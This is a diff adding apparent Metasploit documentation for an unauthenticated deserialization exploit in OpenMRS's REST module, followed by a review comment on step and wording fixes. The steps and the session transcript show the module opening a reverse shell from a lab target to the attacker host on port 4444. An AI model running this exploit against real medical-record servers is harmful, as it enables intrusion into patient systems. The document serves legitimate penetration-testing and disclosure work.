add docs
@@ -0,0 +1,69 @@
## Vulnerable Application
OpenMRS is an open-source platform that supplies
users with a customizable medical record system.
There exists an object deserialization vulnerability
in the `webservices.rest` module used in OpenMRS Platform
for versions below `v2.24.0`. Unauthenticated remote code
execution can be achieved by sending a malicious XML payload
to a Rest API endpoint such as `/ws/rest/v1/concept`.
Vulnerable versions of the software can be found [here](https://sourceforge.net/projects/openmrs/files/releases/).
Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
8 and Java 9.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/multi/http/openmrs_deserialization```
4. Do: ```set TARGETURI <uri>```
5. Do: ```set RHOSTS <ip>```
6. Do: ```run```
7. You should get a shell.
## Options
**ForceExploit**
Overrides the check result and runs the exploit.
## Scenarios
### Version of software and OS as applicable
```
msf5 > use exploit/multi/http/openmrs_deserialization
msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168
rhosts => 192.168.37.168
msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
targeturi => /openmrs-standalone
msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/http/openmrs_deserialization) > check
[*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
msf5 exploit(multi/http/openmrs_deserialization) > run
[*] Started reverse TCP double handler on 192.168.37.1:4444
[*] Target is running OpenMRS
[*] Formatting payload
[*] Sending payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo wKYK4x9ZOHJ37tm7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "wKYK4x9ZOHJ37tm7\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600
whoami
space
id
uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
```
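Review bot: the Verification Steps leave out two things the Scenarios transcript depends on: `set LHOST <ip>` (the session runs `set lhost 192.168.37.1` before `run`) and a `check` step, which matters here because the only documented option, ForceExploit, is defined as overriding the check result; add `Do: `set LHOST <ip>`` and `Do: `check`` between steps 5 and 6, and since the transcript targets port 8081, add a `set RPORT` step if that is not the module default. Two smaller points: the affected-version sentence reads as though `v2.24.0` were an OpenMRS Platform version, while the tested targets are platform `v2.1.2` and `v2.21`, so say explicitly which component (the `webservices.rest` module or the platform) the bound applies to, and use one version format for the two tested versions; and the `### Version of software and OS as applicable` heading is the documentation template placeholder and should name the setup actually shown in the transcript (OpenMRS Platform 2.1.2 standalone, served under `/openmrs-standalone` on port 8081). Style: steps 3 to 6 wrap inline commands in triple backticks where single backticks are the convention for inline code, and "Rest API" should read "REST API".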